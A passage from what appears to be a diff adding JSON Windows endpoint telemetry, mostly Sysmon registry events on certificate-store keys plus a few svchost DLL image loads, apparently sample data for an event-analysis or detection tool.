"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "samlib.dll", + "image_path": "C:\\Windows\\System32\\samlib.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 